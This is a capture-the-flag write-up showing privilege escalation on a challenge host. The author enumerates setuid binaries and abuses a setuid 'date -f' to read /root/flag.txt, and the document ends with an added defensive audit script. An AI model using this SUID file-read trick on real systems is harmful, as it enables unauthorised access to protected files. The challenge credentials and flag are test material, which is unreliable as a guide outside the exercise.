root-me
Points: 400
- SSH into the challenge host, 0.cloud.chals.io on port 19777
- Username: ubuntu Password: jctf2022!
- Find the flag
Solving
We have login credentials for a server... so let's dive in:
ssh ubuntu@0.cloud.chals.io -p 19777
Okay... first we check sudo permissions, therefore just use sudo -l, but we don't have any permissions.
So let's look for some other quickwins, shall we?
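There is something called the SUID bit (setuid, often mixed up with the sticky bit) in Linux. A binary with this bit set runs with the permissions of its owner, so with a root-owned one we could possibly escalate our privileges.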
ubuntu@5f2d47a58826:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/date
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
Ah great - there are some bins we could use... I'll go with date. Its -f option reads dates from a file, so with this we can read a file with root permissions.
Let's try that:
ubuntu@5f2d47a58826:~$ LFILE=/root/flag.txt
ubuntu@5f2d47a58826:~$ date -f $LFILE
date: invalid date 'jctf{4cc355_6r4n73d}'
Great, there it is
GTFO bins
Please keep this in mind. Sometimes the SUID bit is necessary, but it is also dangerous. The GitHub page gtfobins.github.io will show the tricks to weaponize such bins.
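For the defensive side of the same finding, here is an added example (not part of the original write-up): a shell audit that compares a setuid listing against a reviewed baseline and reports anything extra, such as the /usr/bin/date seen on this host. The baseline contents and all function names are assumptions made for the example.

```shell
#!/bin/sh
# Added example: flag setuid files that are not in a reviewed baseline.

# Baseline (assumption): the setuid set expected on a stock Ubuntu image,
# i.e. the find output above without /usr/bin/date.
suid_baseline() {
    cat <<'EOF'
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
EOF
}

# Read setuid paths on stdin (one per line) and print those missing from
# the baseline. Matching is whole-line and literal (-x -F), so a path that
# only contains a baseline path as a substring is still reported.
unexpected_suid() {
    baseline_file=$(mktemp) || return 1
    suid_baseline > "$baseline_file"
    grep -vxF -f "$baseline_file" || true   # grep exits 1 when nothing is left
    rm -f "$baseline_file"
}

# Scan the local root filesystem (-xdev stays on it) for root-owned setuid files.
scan_suid() {
    find / -xdev -type f -user root -perm -u=s 2>/dev/null | unexpected_suid
}

# Constructed sample: the listing from the challenge host shown above.
sample_listing() {
    suid_baseline
    echo /usr/bin/date
}

# Demo on the constructed sample; on a real host call scan_suid instead.
sample_listing | unexpected_suid
```

Each reported path should be reviewed and, if the bit is not needed, cleared with chmod u-s on that path.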